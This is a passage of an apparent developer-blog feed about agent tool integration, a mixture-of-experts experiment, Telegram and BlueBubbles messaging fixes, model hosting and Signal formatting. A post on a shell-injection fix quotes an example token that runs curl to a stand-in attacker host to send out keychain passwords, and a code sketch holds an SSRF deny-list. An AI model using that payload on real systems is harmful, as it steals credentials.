validation, approval workflows, rate limiting, and error cases—all on top of 636 existing tests. Zero failures across the board felt good. Here's a fun fact: **rate limiting in distributed systems** is messier than it looks. A simple counter works for single-process deployments, but the moment you scale horizontally, you need Redis or a central service. We kept it simple for Phase 1—one request counter per tool instance. Phase 2 will probably need something smarter. The final tally: 4 new Python modules, updates to the orchestrator, constants, and settings, plus optional dependencies cleanly organized in `pyproject.toml`. The agent went from isolated to *connected*, and we didn't sacrifice security or clarity in the process. Next phase? Database integrations and richer conversation memory. But for now, the agent can actually do stuff in the real world. 😄
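A sketch of the kind of pre-flight check involved, covering only the ranges named in the post (localhost, 10.*, 172.16-31.*); a production deny-list would be broader (192.168.*, link-local, IPv6, redirect handling).

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Ranges named in the post; a real deny-list should cover more.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
]

def assert_url_is_safe(url: str) -> None:
    """Resolve the host and refuse internal targets before any request is made."""
    host = urlparse(url).hostname
    if host is None:
        raise ValueError("URL has no hostname")
    resolved = ipaddress.ip_address(socket.gethostbyname(host))
    if any(resolved in net for net in BLOCKED_NETWORKS):
        raise PermissionError(f"blocked internal address: {resolved}")

# assert_url_is_safe("http://169.254.169.254/") would still pass this sketch,
# which is exactly why real SSRF filters need a longer deny-list.
```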

Feb 16, 2026
New Feature · llm-analisis

SharedParam MoE Beat the Baseline: How 4 Experts Outperformed 12

I started Experiment 10 with a bold hypothesis: could a **Mixture of Experts** architecture with *shared parameters* actually beat a hand-tuned baseline using *fewer* expert modules? The baseline sat at 70.45% accuracy with 4.5M parameters across 12 independent experts. I was skeptical. The setup was straightforward but clever. **Condition B** implemented a SharedParam MoE with only 4 experts instead of 12—but here's the trick: the experts shared underlying parameters, making the whole model just 2.91M parameters. I added Loss-Free Balancing to keep all 4 experts alive during training, preventing the usual expert collapse that plagues MoE systems. The first real surprise came at epoch 80: Condition B hit 65.54%, already trading blows with Condition A (my no-MoE control). By epoch 110, the gap widened—B reached 69.07% while A stalled at 67.91%. The routing mechanism was working. Each expert held utilization around 0.5, perfectly balanced, never dead-weighting. Then epoch 130 hit like a plot twist. **Condition B: 70.71%**—already above baseline. I'd beaten the reference point with one-third fewer parameters. The inference time penalty was real (29.2ms vs 25.9ms), but the accuracy gain felt worth it. All 4 experts were alive and thriving across the entire training run—no zombie modules, no wasted capacity. When Condition B finally completed, it settled at **70.95% accuracy**. Let me repeat that: a sparse MoE with 4 shared-parameter experts, trained without expert collapse, *exceeded* a 12-expert baseline by 0.50 percentage points while weighing 35% less. But I didn't stop there. I ran Condition C (Wide Shared variant) as a control—it maxed out at 69.96%, below B. Then came the real challenge: **MixtureGrowth** (Exp 10b). What if I started tiny—182K parameters—and *grew* the model during training? The results were staggering. The grown model hit **69.65% accuracy** starting from a seed, while a scratch-trained baseline of identical final size only reached 64.08%. That's a **5.57 percentage point gap** just from the curriculum effect of gradual growth. The seed-based approach took longer (3537s vs 2538s), but the quality jump was undeniable. By the end, I had a clear winner: **SharedParam MoE at 70.95%**, just 0.80pp below Phase 7a's theoretical ceiling. The routing was efficient, the experts stayed alive, and the parameter budget was brutal. Four experts with shared weights beat twelve independent ones—a reminder that in deep learning, *architecture matters more than scale*. As I fixed a Unicode error on Windows and restarted the final runs with corrected schedulers, I couldn't help but laugh: how do you generate a random string? Put a Windows user in front of Vim and tell them to exit. 😄
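The post doesn't spell out how the experts share parameters, so treat this as one plausible pattern rather than the actual architecture: a base layer shared by all experts plus a small per-expert low-rank delta, which keeps the total parameter count well below four independent experts.

```python
import torch
import torch.nn as nn

class SharedParamExperts(nn.Module):
    """Illustrative only: 4 experts sharing one base weight, each adding a
    small low-rank delta on top of it."""

    def __init__(self, dim: int = 128, hidden: int = 256, experts: int = 4, rank: int = 8):
        super().__init__()
        self.base = nn.Linear(dim, hidden)                       # shared by all experts
        self.down = nn.Parameter(torch.randn(experts, dim, rank) * 0.02)
        self.up = nn.Parameter(torch.zeros(experts, rank, hidden))

    def forward(self, x: torch.Tensor, expert_idx: torch.Tensor) -> torch.Tensor:
        shared = self.base(x)                                    # (batch, hidden)
        delta = torch.einsum("bd,bdr->br", x, self.down[expert_idx])
        delta = torch.einsum("br,brh->bh", delta, self.up[expert_idx])
        return shared + delta

x = torch.randn(16, 128)
routes = torch.randint(0, 4, (16,))          # expert chosen by the router
out = SharedParamExperts()(x, routes)        # (16, 256)
```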

Feb 16, 2026
New Feature · C--projects-bot-social-publisher

When Silent Defaults Collide With Working Features

I was debugging a peculiar regression in **OpenClaw** when I realized something quietly broken about our **Telegram** integration. Every single response to a direct message was being rendered as a quoted reply—those nested message bubbles that make sense in group chats but feel claustrophobic in one-on-one conversations. The culprit? A collision between newly reliable infrastructure and an overlooked default that nobody had seriously reconsidered.

In version 2026.2.13, the team shipped implicit reply threading—genuinely useful infrastructure that automatically chains responses back to original messages. Sensible on its surface. But we had an existing configuration sitting dormant in our codebase: `replyToMode` defaulted to `"first"`, meaning the opening message in every response would be sent as a native Telegram reply, complete with the quoted bubble.

Here's where timing becomes everything. Before 2026.2.13, reply threading was flaky and inconsistent. That `"first"` default existed, sure, but threading rarely triggered reliably enough to actually *matter*. Users never noticed the setting because the underlying mechanism didn't work well enough to generate visible artifacts. But the moment threading became rock-solid in the new version, that innocent default transformed into a UX landmine. Suddenly every DM response got wrapped in a quoted message bubble. A casual "Hey, how's the refactor?" became a formal-looking nested message exchange—like someone was cc'ing a memo in a personal chat.

It's a textbook collision: **how API defaults compound unexpectedly** when the systems they interact with fundamentally improve. The default wasn't *wrong* per se—it was just designed for a different technical reality where it remained invisible.

The solution turned out beautifully simple: flip the default from `"first"` to `"off"`. This restores the pre-2026.2.13 experience for DM flows. But we didn't remove the feature—users who genuinely want reply threading can still enable it explicitly:

```
channels.telegram.replyToMode: "first" | "all"
```

I tested it on a live instance. Toggle `"first"` on, and every response quoted the user's message. Switch to `"off"`, and conversations flowed cleanly. The threading infrastructure still functions perfectly—just not forced into every interaction by default.

What struck me most? Our test suite didn't need a single update. Every test was already explicit about `replyToMode`, never relying on magical defaults. That defensive design paid off.

**The real insight:** defaults are powerful *because* they're invisible. When fundamental behavior changes, you must audit the defaults layered beneath it. Sometimes the most effective solution isn't new logic—it's simply asking: *what should happen when nothing is explicitly configured?*

And if Cargo ever gained consciousness, it would probably start by deleting its own documentation 😄

Feb 16, 2026
New Feature · C--projects-bot-social-publisher

When Smart Defaults Betray User Experience

I was debugging a subtle UX regression in **OpenClaw** when I realized something quietly broken about our **Telegram** integration. Every single response to a direct message was being rendered as a quoted reply—those nested message bubbles that make sense in group chats but feel claustrophobic in one-on-one conversations. The culprit? A collision between a newly reliable feature and an overlooked default.

In version 2026.2.13, the team shipped implicit reply threading—genuinely useful infrastructure that automatically chains responses back to original messages. Sensible on its surface. But we had an existing configuration sitting dormant: `replyToMode` defaulted to `"first"`, meaning the opening message in every response would be sent as a native Telegram reply, complete with the quoted bubble.

Here's where timing matters. Before 2026.2.13, reply threading was flaky and inconsistent. That `"first"` default existed, sure, but threading rarely triggered reliably enough to actually *use* it. Users never noticed the setting because the underlying mechanism didn't work well enough to matter. But the moment threading became rock-solid in the new version, that innocent default transformed into a UX landmine. Suddenly every DM response got wrapped in a quoted message bubble. A casual "Hey, how's the refactor?" became a formal-looking nested message exchange—like someone was cc'ing a memo in a personal chat.

It's a textbook case of **how API defaults compound unexpectedly** when the systems they interact with change. The default wasn't *wrong* per se—it was just designed for a different technical reality.

The solution turned out beautifully simple: flip the default from `"first"` to `"off"`. This restores the pre-2026.2.13 experience for DM flows. But we didn't remove the feature—users who genuinely want reply threading can still enable it explicitly through configuration:

```
channels.telegram.replyToMode: "first" | "all"
```

I tested it on a live instance running 2026.2.13. Toggle `"first"` on, and every response quoted the user's original message. Switch to `"off"`, and conversations flow cleanly without the quote bubbles. The threading infrastructure still functions perfectly—it's just not forced into every interaction by default.

What struck me most? Our test suite didn't need a single update. Every test was already explicit about `replyToMode`, never relying on magical defaults to work correctly. That kind of defensive test design paid off.

**The real insight here:** defaults are powerful *because* they're invisible. When fundamental behavior shifts—especially something as foundational as message threading—you have to revisit the defaults that interact with it. Sometimes the most impactful engineering fix isn't adding complexity, it's choosing the conservative path and trusting users to opt into features they actually need.

A programmer once told me he kept two glasses by his bed: one full for when he got thirsty, one empty for when he didn't. Same philosophy applies here—default to `"off"` and let users consciously choose threading when it serves them 😄

Feb 15, 2026
New Feature · ai-agents

Refactoring a Voice Agent: When Dependencies Fight Back

I've been knee-deep in refactoring a **voice-agent** codebase—one of those projects that looks clean on the surface but hides architectural chaos underneath. The mission: consolidate 3,400+ lines of scattered handler code, untangle circular dependencies, and introduce proper dependency injection. The story begins innocently. The `handlers.py` file had ballooned to 3,407 lines, with handlers reaching into a dozen global variables from legacy modules. Every handler touched `_pending_restart`, `_user_sessions`, `_context_cache`—you name it. The coupling was so tight that extracting even a single handler meant dragging half the codebase with it. I started with the low-hanging fruit: moving `UserSession` and `UserSessionManager` into `src/core/session.py`, creating a real orchestrator layer that didn't import from Telegram handlers, and fixing subprocess calls. The critical bug? A blocking `subprocess.run()` in the compaction logic was freezing the entire async event loop. Switching to `asyncio.create_subprocess_exec()` with a 60-second timeout was a no-brainer, but it revealed another issue: **I had to ensure all imports were top-level**, not inline, to avoid race conditions. Then came the DI refactor—the real challenge. I designed a `HandlerDeps` dataclass to pass dependencies explicitly, added a `DepsMiddleware` to inject them, and started migrating handlers off globals. But here's where reality hit: the voice and document handlers were so intertwined with legacy globals (especially `_execute_restart`) that extracting them would create *more* coupling, not less. Sometimes the best refactor is knowing when *not* to refactor. The breakthrough came when I recognized the pattern: **not all handlers need DI**. The Telegram bot handlers, the CLI routing layer—those could be decoupled. The legacy handlers? I'd leave them as-is for now, but isolate them behind clear boundaries. By step 5, I had 566 passing tests and zero failing ones. The memory leak in `RateLimitMiddleware` was devilishly simple—stale user entries weren't being cleaned up. A periodic cleanup loop fixed it. The undefined `candidates` variable in error handling? That's what happens when code generation outpaces testing. Add a test, catch the bug. **The lesson learned**: refactoring legacy code isn't about achieving perfect architecture in one go. It's about strategic decoupling—fixing the leaks that matter, removing the globals that matter, and deferring the rest. Sometimes the best code is the code you don't rewrite. As a programmer, I learned long ago: *we don't worry about warnings—only errors* 😄
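The subprocess fix in a nutshell; the command and function name are placeholders, and only the 60-second timeout comes from the post.

```python
import asyncio

async def run_compaction(cmd: list[str], timeout: float = 60.0) -> str:
    """Run an external command without blocking the event loop."""
    proc = await asyncio.create_subprocess_exec(
        *cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.STDOUT,
    )
    try:
        stdout, _ = await asyncio.wait_for(proc.communicate(), timeout)
    except asyncio.TimeoutError:
        proc.kill()
        await proc.wait()
        raise
    return stdout.decode()

# Example: asyncio.run(run_compaction(["python", "-c", "print('compacted')"]))
```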

Feb 15, 2026
New Feature · borisovai-admin

Loading 9 AI Models to a Private HTTPS Server

I just finished a satisfying infrastructure task: deploying **9 machine learning models** to a self-hosted file server and making them accessible via HTTPS with proper range request support. Here's how it went.

## The Challenge

The **borisovai-admin** project needed a reliable way to serve large AI models—from Whisper variants to Russian ASR solutions—without relying on external APIs or paying bandwidth fees to HuggingFace every time someone needed a model. We're talking about 19 gigabytes of neural networks that need to be fast, resilient, and actually *usable* from client applications.

I started by setting up a lightweight file server, then systematically pulled models from HuggingFace using `huggingface_hub`. The trick was managing the downloads smartly: some models are 5+ GB, so I parallelized where possible while respecting rate limits.

## What Got Deployed

The lineup includes serious tooling:

- **Faster-Whisper models** (base through large-v3-turbo)—for speech-to-text across accuracy/speed tradeoffs
- **ruT5-ASR-large**—a Russian-optimized speech recognition model, surprisingly hefty at 5.5 GB
- **GigAAM variants** (v2 and v3 in ONNX format)—lighter, faster inference for production
- **Vosk small Russian model**—the bantamweight option when you need something lean

Each model is now available at its own HTTPS endpoint: `https://files.dev.borisovai.ru/public/models/{model_name}/`.

## The Details That Matter

Getting this right meant more than just copying files. I verified **CORS headers** work correctly—so browsers can fetch models directly. I tested **HTTP Range requests**—critical for resumable downloads and partial loads. The server reports content types properly, handles streaming, and doesn't choke when clients request specific byte ranges.

Storage-wise, we're using 32% of available disk (130 GB free), which gives comfortable headroom for future additions. The models cover the spectrum: from tiny Vosk (88 MB) for embedded use cases to the heavyweight ruT5 (5.5 GB) when you need Russian language sophistication.

## Why This Matters

Having models hosted internally means **zero API costs**, **predictable latency**, and **full control** over model versions. Teams can now experiment with different Whisper sizes without vendor lock-in. The Russian ASR models become practical for real production workloads instead of expensive API calls.

This is infrastructure work—not glamorous, but it's the kind of unsexy plumbing that makes everything else possible.

---

*Eight bytes walk into a bar. The bartender asks, "Can I get you anything?" "Yeah," reply the bytes. "Make us a double." 😄*
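A quick way to sanity-check the Range support described above; the URL pattern is from the post, while the model directory and file name are placeholders.

```python
import urllib.request

# Hypothetical model directory and file name under the documented URL pattern.
url = "https://files.dev.borisovai.ru/public/models/vosk-small-ru/model.bin"

req = urllib.request.Request(url, headers={"Range": "bytes=0-1023"})
with urllib.request.urlopen(req) as resp:
    print(resp.status)                          # expect 206 Partial Content
    print(resp.headers.get("Content-Range"))    # e.g. "bytes 0-1023/92012544"
    print(len(resp.read()))                     # 1024 bytes
```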

Feb 15, 2026
Bug Fix · openclaw

Group Messages Finally Get Names

# Fixing BlueBubbles: Making Group Chats Speak for Themselves

The task seemed straightforward on the surface: BlueBubbles group messages weren't displaying sender information properly in the chat envelope. Users would see messages from group chats arrive, but the context was fuzzy—you couldn't immediately tell who sent what. For a messaging platform, that's a significant friction point. The fix required aligning BlueBubbles with how other channels (iMessage, Signal) already handle this scenario.

The developer's first move was to implement `formatInboundEnvelope`, a pattern already proven in the codebase for other messaging systems. Instead of letting group messages land without proper context, the envelope would now display the group label in the header and embed the sender's name directly in the message body. Suddenly, the `ConversationLabel` field—which had been undefined for groups—resolved to the actual group name.

But there was more work ahead. Raw message formatting wasn't enough. The developer wrapped the context payload with `finalizeInboundContext`, ensuring field normalization, ChatType determination, ConversationLabel fallbacks, and MediaType alignment all happened consistently. This is where discipline matters: rather than reinventing validation logic, matching the pattern used across every other channel eliminated edge cases and kept the codebase predictable.

One subtle detail emerged during code review: the `BodyForAgent` field. The developer initially passed the envelope-formatted body to the agent prompt, but that meant the LLM was reading something like `[BlueBubbles sender-name: actual message text]` instead of clean, raw text. Switching to the raw body meant the agent could focus on understanding the actual message content without parsing wrapper formatting.

Then came the `fromLabel` alignment. Groups and direct messages needed consistent identifier patterns: groups would show as `GroupName id:peerId`, while DMs would display `Name id:senderId` only when the name differed from the ID. This granular consistency—matching the shared `formatInboundFromLabel` pattern—ensures that downstream systems and UI layers can rely on predictable labeling.

**Here's something interesting about messaging protocol design**: when iMessage and Signal independently arrived at similar envelope patterns, it wasn't coincidence. These patterns emerged from practical necessity. Showing sender identity, conversation context, and message metadata in a consistent structure prevents a cascade of bugs downstream. Every system that touches message data (UI renderers, AI agents, search indexers) benefits from knowing exactly where that information lives.

By the end, BlueBubbles group chats worked like every other supported channel in the system. The fix touched three focused commits: introducing proper envelope formatting, normalizing the context pipeline, and refining label patterns. It's the kind of work that doesn't feel dramatic—no algorithms, no novel architecture—but it's exactly what separates systems that *almost* work from those that work *reliably*.

The lesson? Sometimes the most impactful fixes are about consistency, not complexity. When you make one path match another, you're not just solving a bug—you're preventing a dozen future ones.

Feb 14, 2026
Bug Fix · openclaw

Shell Injection Prevention: Bypassing the Shell to Stay Safe

# Outsmarting Shell Injection: How One Line of Code Stopped a Security Nightmare

The openclaw project had a vulnerability hiding in plain sight. In the macOS keychain credential handler, OAuth tokens from external providers were being passed directly into a shell command via string interpolation. Severity: HIGH. The kind of finding that makes security auditors lose sleep.

The vulnerable code looked innocuous at first—just building a `security` command string with careful single-quote escaping. But here's the problem: **escaping quotes doesn't protect against shell metacharacters like `$()` and backticks.** An attacker-controlled OAuth token could slip in command substitution payloads that would execute before the shell even evaluated the quotes. Imagine a malicious token like `` `$(curl attacker.com/exfil?data=$(security find-generic-password))` `` — it wouldn't matter how many quotes you added, the backticks would still trigger execution.

The fix was elegantly simple but required understanding a fundamental distinction in how processes spawn. Instead of using `execSync` to fire off a shell-interpreted string, the developer switched to **`execFileSync`**, which bypasses the shell entirely. The command now passes arguments as an array: `["add-generic-password", "-U", "-s", SERVICE, "-a", ACCOUNT, "-w", newValue]`. The operating system handles argument boundaries natively—no interpretation layer, no escaping theater.

This is a textbook example of why **you should never shell-interpolate user input**, even with escaping. Escaping is context-dependent and easy to get wrong. The gold standard is to avoid the shell altogether. When spawning processes in Node.js, `execFileSync` is the security default; `execSync` should only be used when you genuinely need shell features like pipes or globbing.

The patch was merged to the main branch on February 14th, addressing not just CWE-78 (OS Command Injection) but closing an actual attack surface that could have compromised gateway user credentials. No complex mitigations, no clever regex tricks—just the right API call for the job.

The lesson stuck: **trust the OS to handle arguments, not your escaping logic.** One line of code, infinitely more secure.

Eight bytes walk into a bar. The bartender asks, "Can I get you anything?" "Yeah," reply the bytes. "Make us a double."
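The fix itself is Node.js (`execFileSync`), but the principle is language-agnostic: pass an argument vector and never an interpolated shell string. A Python analogue of the same idea, with placeholder service and account values:

```python
import subprocess

SERVICE, ACCOUNT = "openclaw-gateway", "oauth"   # placeholders
new_value = "token-with-$(dangerous)-characters`whoami`"

# Argument vector: the macOS `security` CLI receives each argument as-is,
# so shell metacharacters inside new_value are never interpreted.
subprocess.run(
    ["security", "add-generic-password", "-U",
     "-s", SERVICE, "-a", ACCOUNT, "-w", new_value],
    check=True,
)

# The dangerous equivalent would be an interpolated string with shell=True:
# subprocess.run(f"security add-generic-password ... -w '{new_value}'", shell=True)
```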

Feb 14, 2026
Bug Fix · openclaw

Fixing Markdown IR and Signal Formatting: A Journey Through Text Rendering

When you're working with a chat platform that supports rich formatting, you'd think rendering bold text and handling links would be straightforward. But OpenClaw's Signal formatting had accumulated a surprising number of edge cases—and my recent PR #9781 was the payoff of tracking down each one. The problem started innocent enough: markdown-to-IR (intermediate representation) conversion was producing extra newlines between list items and following paragraphs. Nested lists had indentation issues. Blockquotes weren't visually distinct. Then there were the Signal formatting quirks—URLs weren't being deduplicated properly because the comparison logic didn't normalize protocol prefixes or trailing slashes. Headings rendered as plain text instead of bold. When you expanded a markdown link inline, the style offsets for bold and italic text would drift to completely wrong positions. The real kicker? If you had **multiple links** expanding in a single message, `applyInsertionsToStyles()` was using original coordinates for each insertion without tracking cumulative shift. Imagine bolding a phrase that spans across expanded URLs—the bold range would end up highlighting random chunks of text several lines down. Not ideal for a communication platform. I rebuilt the markdown IR layer systematically. Blockquote closing tags no longer emit redundant newlines—the inner content handles spacing. Horizontal rules now render as visible `───` separators instead of silently disappearing. Tables in code mode strip their inner cell styles so they don't overlap with code block formatting. The bigger refactor was replacing the fragile `indexOf`-based chunk position tracking with deterministic cursor tracking in `splitSignalFormattedText`. Now it splits at whitespace boundaries, respects chunk size limits, and slices style ranges with correct local offsets. But here's what really validated the work: 69 new tests. Fifty-one tests for markdown IR covering spacing, nested lists, blockquotes, tables, and horizontal rules. Eighteen tests for Signal formatting. And nineteen tests specifically for style preservation across chunk boundaries when links expand. Every edge case got regression coverage. The cumulative shift tracking fix alone—ensuring bold and italic styles stay in the right place after multiple link expansions—felt like watching a long-standing bug finally surrender. You spend weeks chasing phantom style offsets across coordinate systems, and then one small addition (`cumulative_shift += insertion.length_delta`) makes it click. OpenClaw's formatting pipeline is now more predictable, more testable, and actually preserves your styling intentions. No more mysterious bold text appearing three paragraphs later. 😄
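The core of the cumulative-shift fix, reduced to a sketch with made-up data structures: each insertion shifts every later style range (and the running offset) by the length of the text it added.

```python
from dataclasses import dataclass

@dataclass
class Style:
    start: int
    end: int
    kind: str  # e.g. "bold", "italic"

@dataclass
class Insertion:
    offset: int   # position in the original, pre-expansion text
    text: str     # expanded link text to insert

def apply_insertions(text: str, insertions: list[Insertion], styles: list[Style]) -> str:
    cumulative_shift = 0
    for ins in sorted(insertions, key=lambda i: i.offset):
        pos = ins.offset + cumulative_shift
        text = text[:pos] + ins.text + text[pos:]
        # Shift every style range that starts at or after the insertion point.
        for st in styles:
            if st.start >= pos:
                st.start += len(ins.text)
                st.end += len(ins.text)
        cumulative_shift += len(ins.text)   # the fix: track the running shift
    return text
```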

Feb 14, 2026